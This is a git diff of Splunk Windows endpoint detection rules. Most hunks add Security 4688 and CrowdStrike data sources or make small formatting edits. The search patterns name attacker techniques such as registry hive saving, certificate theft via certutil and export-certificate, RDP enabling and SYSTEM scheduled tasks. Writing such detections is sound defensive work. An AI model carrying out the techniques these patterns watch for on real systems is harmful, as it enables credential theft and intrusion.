--- a/detections/endpoint/windows_proxy_via_registry.yml
+++ b/detections/endpoint/windows_proxy_via_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects the modification of registry keys related
   to the Windows Proxy settings via netsh.exe. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_query_registry_reg_save.yml b/detections/endpoint/windows_query_registry_reg_save.yml
index 8e299c1a7b..65375b15c8 100644
--- a/detections/endpoint/windows_query_registry_reg_save.yml
+++ b/detections/endpoint/windows_query_registry_reg_save.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the reg.exe process
   persist in the environment, or access sensitive information stored in the registry.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where  `process_reg` AND Processes.process
   = "* save *" by Processes.process_name Processes.original_file_name Processes.process
diff --git a/detections/endpoint/windows_raccine_scheduled_task_deletion.yml b/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
index fda8529ff6..cb5045f62c 100644
--- a/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
+++ b/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the deletion of the Raccine Rules
   to potential data encryption and loss.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
   Processes.process="*delete*" AND Processes.process="*Raccine*" by Processes.dest
diff --git a/detections/endpoint/windows_rasautou_dll_execution.yml b/detections/endpoint/windows_rasautou_dll_execution.yml
index ab0e7049ac..03d814e613 100644
--- a/detections/endpoint/windows_rasautou_dll_execution.yml
+++ b/detections/endpoint/windows_rasautou_dll_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of an arbitrary DLL by
   or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rasautou.exe
   Processes.process="* -d *"AND Processes.process="* -p *" by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_registry_bootexecute_modification.yml b/detections/endpoint/windows_registry_bootexecute_modification.yml
index c2ba83897b..546d7f54b7 100644
--- a/detections/endpoint/windows_registry_bootexecute_modification.yml
+++ b/detections/endpoint/windows_registry_bootexecute_modification.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the BootExecute registry
   key, which manages applications and services executed during system boot. It leverages
diff --git a/detections/endpoint/windows_registry_certificate_added.yml b/detections/endpoint/windows_registry_certificate_added.yml
index a74e8c78bc..1166aab216 100644
--- a/detections/endpoint/windows_registry_certificate_added.yml
+++ b/detections/endpoint/windows_registry_certificate_added.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the installation of a root CA certif
   attacker to intercept, decrypt, or manipulate sensitive data, leading to severe
   security breaches.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
   where Registry.registry_path IN ("*\\certificates\\*") AND Registry.registry_value_name="Blob"
diff --git a/detections/endpoint/windows_registry_delete_task_sd.yml b/detections/endpoint/windows_registry_delete_task_sd.yml
index ddbac21920..2b76652237 100644
--- a/detections/endpoint/windows_registry_delete_task_sd.yml
+++ b/detections/endpoint/windows_registry_delete_task_sd.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a process attempting to delete a sch
   access trying to hide their tracks, potentially compromising system integrity and
   security. Immediate investigation is required.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
   where Registry.registry_path IN ("*\\Schedule\\TaskCache\\Tree\\*") Registry.user="SYSTEM"
diff --git a/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml b/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
index 98fc743a01..8f49937bed 100644
--- a/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
+++ b/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the SafeBoot reg
   potentially bypassing certain security measures and facilitating further malicious
   actions.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
   where Registry.registry_path IN ("*SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\*","*SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\*")
diff --git a/detections/endpoint/windows_registry_payload_injection.yml b/detections/endpoint/windows_registry_payload_injection.yml
index fc5a636e73..7268cbf11f 100644
--- a/detections/endpoint/windows_registry_payload_injection.yml
+++ b/detections/endpoint/windows_registry_payload_injection.yml
@@ -14,7 +14,8 @@ description: The following analytic detects suspiciously long data written to th
   to maintain persistence, execute code, or manipulate system configurations without
   leaving a conventional file footprint.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
   AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
   Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/windows_registry_sip_provider_modification.yml b/detections/endpoint/windows_registry_sip_provider_modification.yml
index b3936c9b6a..e32c501a70 100644
--- a/detections/endpoint/windows_registry_sip_provider_modification.yml
+++ b/detections/endpoint/windows_registry_sip_provider_modification.yml
@@ -6,10 +6,10 @@ author: Michael Haag, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: 'The following analytic detects modifications to the Windows Registry
-  SIP Provider. It leverages Sysmon Event ID 7 to monitor registry changes in paths
+  SIP Provider. It leverages Sysmon EventID 7 to monitor registry changes in paths
   and values related to Cryptography Providers and OID Encoding Types. This activity
   is significant as it may indicate an attempt to subvert trust controls, a common
   tactic for bypassing security measures and maintaining persistence. If confirmed
diff --git a/detections/endpoint/windows_regsvr32_renamed_binary.yml b/detections/endpoint/windows_regsvr32_renamed_binary.yml
index 364564698a..756589cc02 100644
--- a/detections/endpoint/windows_regsvr32_renamed_binary.yml
+++ b/detections/endpoint/windows_regsvr32_renamed_binary.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where the regsvr32.exe
   persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name != regsvr32.exe
   AND Processes.original_file_name=regsvr32.exe by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_remote_access_software_hunt.yml b/detections/endpoint/windows_remote_access_software_hunt.yml
index cb2269e501..fca384f7fa 100644
--- a/detections/endpoint/windows_remote_access_software_hunt.yml
+++ b/detections/endpoint/windows_remote_access_software_hunt.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of remote access software
   any unauthorized utilities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process) as process values(Processes.parent_process)
   as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown
diff --git a/detections/endpoint/windows_remote_access_software_rms_registry.yml b/detections/endpoint/windows_remote_access_software_rms_registry.yml
index bb79c75394..e883290d69 100644
--- a/detections/endpoint/windows_remote_access_software_rms_registry.yml
+++ b/detections/endpoint/windows_remote_access_software_rms_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation or modification of Wind
   allow attackers to remotely control the targeted host, leading to potential data
   exfiltration, system manipulation, or further network compromise.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SYSTEM\\Remote
diff --git a/detections/endpoint/windows_remote_assistance_spawning_process.yml b/detections/endpoint/windows_remote_assistance_spawning_process.yml
index 9a76051121..8a42185fe2 100644
--- a/detections/endpoint/windows_remote_assistance_spawning_process.yml
+++ b/detections/endpoint/windows_remote_assistance_spawning_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects Microsoft Remote Assistance (msra.ex
   on the compromised system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=msra.exe
   `windows_shells` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_remote_create_service.yml b/detections/endpoint/windows_remote_create_service.yml
index e904d6be26..540a231e87 100644
--- a/detections/endpoint/windows_remote_create_service.yml
+++ b/detections/endpoint/windows_remote_create_service.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the creation of a new service on a
   remote endpoint using sc.exe. It leverages data from Endpoint Detection and Response
   (EDR) agents, specifically monitoring for EventCode 7045, which indicates a new
diff --git a/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml b/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
index 8a4638c731..9102087879 100644
--- a/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
+++ b/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the RDPWInst.exe to
   unauthorized access, data exfiltration, and further compromise of the targeted host.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name="RDPWInst.exe" OR Processes.original_file_name="RDPWInst.exe")
diff --git a/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml b/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
index 4e48f92957..6bda4a9dc6 100644
--- a/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
+++ b/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects modifications to the Windows firewal
   network compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
   values(Processes.parent_process_name) as parent_process values(Processes.process_name)
   count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/windows_remote_services_allow_remote_assistance.yml b/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
index 0c1d265e0b..390f815024 100644
--- a/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
+++ b/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
   remotely access and control the compromised host, leading to potential data exfiltration
   or further system compromise.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Control\\Terminal
diff --git a/detections/endpoint/windows_remote_services_rdp_enable.yml b/detections/endpoint/windows_remote_services_rdp_enable.yml
index 8cdb6f35ef..4d62b4d31a 100644
--- a/detections/endpoint/windows_remote_services_rdp_enable.yml
+++ b/detections/endpoint/windows_remote_services_rdp_enable.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
   host, potentially leading to further exploitation and lateral movement within the
   network.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Control\\Terminal
diff --git a/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml b/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
index 08b286b748..ec22b31589 100644
--- a/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
+++ b/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of a suspicious rundll32
   command line that updates user-specific system parameters, such as desktop backgrounds,
   display settings, and visual themes. It leverages data from Endpoint Detection and
diff --git a/detections/endpoint/windows_rundll32_webdav_request.yml b/detections/endpoint/windows_rundll32_webdav_request.yml
index 52a4f2f30b..162eecae41 100644
--- a/detections/endpoint/windows_rundll32_webdav_request.yml
+++ b/detections/endpoint/windows_rundll32_webdav_request.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the execution of rundll32.exe with
   command-line arguments loading davclnt.dll and the davsetcookie function to access
   a remote WebDAV instance. This detection leverages data from Endpoint Detection
diff --git a/detections/endpoint/windows_scheduled_task_created_via_xml.yml b/detections/endpoint/windows_scheduled_task_created_via_xml.yml
index fe8cfebc59..89770fce58 100644
--- a/detections/endpoint/windows_scheduled_task_created_via_xml.yml
+++ b/detections/endpoint/windows_scheduled_task_created_via_xml.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: 'The following analytic detects the creation of scheduled tasks in Windows
   using schtasks.exe with the -create flag and an XML parameter. This detection leverages
   data from Endpoint Detection and Response (EDR) agents, focusing on command-line
diff --git a/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml b/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
index 5890126fb4..613baa3846 100644
--- a/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
+++ b/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects when the Task Scheduler service ("sv
   persistence, or escalate privileges within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*\\system32\\svchost.exe*"
   AND Processes.parent_process="*-k*" AND Processes.parent_process= "*netsvcs*" AND
diff --git a/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml b/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
index 4b0730ba79..422b8186f5 100644
--- a/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
+++ b/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the creation of a new scheduled tas
   system access and data breaches.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe"
   Processes.process = "*/rl *" Processes.process = "* highest *" by Processes.process_name
diff --git a/detections/endpoint/windows_schtasks_create_run_as_system.yml b/detections/endpoint/windows_schtasks_create_run_as_system.yml
index b92dfcc83b..4c101f1cb2 100644
--- a/detections/endpoint/windows_schtasks_create_run_as_system.yml
+++ b/detections/endpoint/windows_schtasks_create_run_as_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of a new scheduled task
   and mitigation are crucial to prevent further damage.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_schtasks` Processes.process="*/create
   *" AND Processes.process="*/ru *" AND Processes.process="*system*" by Processes.dest
diff --git a/detections/endpoint/windows_security_account_manager_stopped.yml b/detections/endpoint/windows_security_account_manager_stopped.yml
index 26fba01c92..ea67e8ab1a 100644
--- a/detections/endpoint/windows_security_account_manager_stopped.yml
+++ b/detections/endpoint/windows_security_account_manager_stopped.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the stopping of the Windows Security
   compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes WHERE ("Processes.process_name"="net*.exe"
   "Processes.process"="*stop \"samss\"*") BY Processes.dest Processes.user Processes.process
diff --git a/detections/endpoint/windows_security_support_provider_reg_query.yml b/detections/endpoint/windows_security_support_provider_reg_query.yml
index 5f71816289..a411a590b5 100644
--- a/detections/endpoint/windows_security_support_provider_reg_query.yml
+++ b/detections/endpoint/windows_security_support_provider_reg_query.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies command-line activity querying th
   system security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
   = "* query *" AND Processes.process = "*\\SYSTEM\\CurrentControlSet\\Control\\LSA*"
diff --git a/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml b/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
index 1cad2e24b4..be217da44e 100644
--- a/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
+++ b/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of GACUtil.exe to add a DLL
   to privilege escalation or persistent access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=gacutil.exe
   Processes.process IN ("*-i *","*/i *") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_service_create_kernel_mode_driver.yml b/detections/endpoint/windows_service_create_kernel_mode_driver.yml
index fc933c8469..707c7296c2 100644
--- a/detections/endpoint/windows_service_create_kernel_mode_driver.yml
+++ b/detections/endpoint/windows_service_create_kernel_mode_driver.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation of a new kernel mode
   security measures.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sc.exe
   Processes.process="*kernel*" by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_service_create_remcomsvc.yml b/detections/endpoint/windows_service_create_remcomsvc.yml
index 347e982c9d..0d71be6da5 100644
--- a/detections/endpoint/windows_service_create_remcomsvc.yml
+++ b/detections/endpoint/windows_service_create_remcomsvc.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
 type: Anomaly
 status: production
 data_source:
-- Windows System 7045
+- Windows Event Log System 7045
 description: The following analytic detects the creation of the RemComSvc service
   on a Windows endpoint, typically indicating lateral movement using RemCom.exe. It
   leverages Windows EventCode 7045 from the System event log, specifically looking
diff --git a/detections/endpoint/windows_service_create_with_tscon.yml b/detections/endpoint/windows_service_create_with_tscon.yml
index 2c3e6c81a1..d490345a09 100644
--- a/detections/endpoint/windows_service_create_with_tscon.yml
+++ b/detections/endpoint/windows_service_create_with_tscon.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects potential RDP Hijacking attempts by identifying
   the creation of a Windows service using sc.exe with a binary path that includes
   tscon.exe. This detection leverages data from Endpoint Detection and Response (EDR)
diff --git a/detections/endpoint/windows_service_creation_on_remote_endpoint.yml b/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
index 642eac7e5c..7b95893fb1 100644
--- a/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
+++ b/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation of a Windows Service
   to further compromise and persistence within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sc.exe
   OR Processes.original_file_name=sc.exe) (Processes.process=*\\\\* AND Processes.process=*create*
diff --git a/detections/endpoint/windows_service_creation_using_registry_entry.yml b/detections/endpoint/windows_service_creation_using_registry_entry.yml
index 642788bb65..3815ab0278 100644
--- a/detections/endpoint/windows_service_creation_using_registry_entry.yml
+++ b/detections/endpoint/windows_service_creation_using_registry_entry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of registry keys th
   this could allow an attacker to maintain access, escalate privileges, or move laterally
   within the network, leading to data theft, ransomware, or other damaging outcomes.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\SYSTEM\\CurrentControlSet\\Services*" Registry.registry_value_name
diff --git a/detections/endpoint/windows_service_deletion_in_registry.yml b/detections/endpoint/windows_service_deletion_in_registry.yml
index 0af4d50988..c7b30db767 100644
--- a/detections/endpoint/windows_service_deletion_in_registry.yml
+++ b/detections/endpoint/windows_service_deletion_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of a service from the W
   allow attackers to maintain a lower profile within the environment, complicating
   detection and remediation efforts.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SYSTEM\\CurrentControlSet\\Services*"
diff --git a/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml b/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
index 7c59bd88a4..4eb50b66c0 100644
--- a/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
+++ b/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `sc.exe` with comma
   potentially leading to further compromise and persistence within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sc.exe
   OR Processes.original_file_name=sc.exe) (Processes.process=*\\\\* AND Processes.process=*start*)
diff --git a/detections/endpoint/windows_service_stop_by_deletion.yml b/detections/endpoint/windows_service_stop_by_deletion.yml
index e2d4305a69..e03a0339d1 100644
--- a/detections/endpoint/windows_service_stop_by_deletion.yml
+++ b/detections/endpoint/windows_service_stop_by_deletion.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `sc.exe` to delete a Wind
   access to the compromised system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name = sc.exe OR Processes.original_file_name = sc.exe)
diff --git a/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml b/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
index 3043128ae5..8bee80e860 100644
--- a/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
+++ b/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies attempts to stop services on a sy
   or disrupt essential services, leading to potential data loss or system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where `process_net` OR  Processes.process_name
   = "sc.exe" OR Processes.original_file_name= "sc.exe" AND Processes.process="*stop*"
diff --git a/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml b/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
index 02ac75ad3a..0b1a4bd6af 100644
--- a/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
+++ b/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic identifies modifications to the registry path
   .wav\\OpenWithProgIds, associated with the Snake Malware campaign. It leverages
diff --git a/detections/endpoint/windows_soaphound_binary_execution.yml b/detections/endpoint/windows_soaphound_binary_execution.yml
index 072c606580..ab9a4a5e1d 100644
--- a/detections/endpoint/windows_soaphound_binary_execution.yml
+++ b/detections/endpoint/windows_soaphound_binary_execution.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the SOAPHound binary
   (`soaphound.exe`) with specific command-line arguments. It leverages data from Endpoint
   Detection and Response (EDR) agents, focusing on process names, command-line arguments,
diff --git a/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml b/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
index 9c851dbfd0..049d921724 100644
--- a/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
+++ b/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
@@ -15,6 +15,8 @@ description: The following analytic detects OneNote spawning `mshta.exe`, a beha
   Immediate investigation and containment are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("onenote.exe", "onenotem.exe") `process_mshta` by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_sql_spawning_certutil.yml b/detections/endpoint/windows_sql_spawning_certutil.yml
index 1dba7e5dab..0fc30cee1f 100644
--- a/detections/endpoint/windows_sql_spawning_certutil.yml
+++ b/detections/endpoint/windows_sql_spawning_certutil.yml
@@ -7,6 +7,8 @@ status: experimental
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of certutil to download software,
   specifically when spawned by SQL-related processes. This detection leverages Endpoint
   Detection and Response (EDR) data, focusing on command-line executions involving
diff --git a/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml b/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
index 4e5c872b2d..eb383c7f53 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects CertUtil.exe performing a backup of
   breaches.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process
   IN ("*-backupdb *", "*-backup *") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml b/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
index 40f3214de9..f6707a3b2a 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the PowerShell cmdlet 'ex
   or gain unauthorized access to systems and data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process="*export-certificate*"
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml b/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
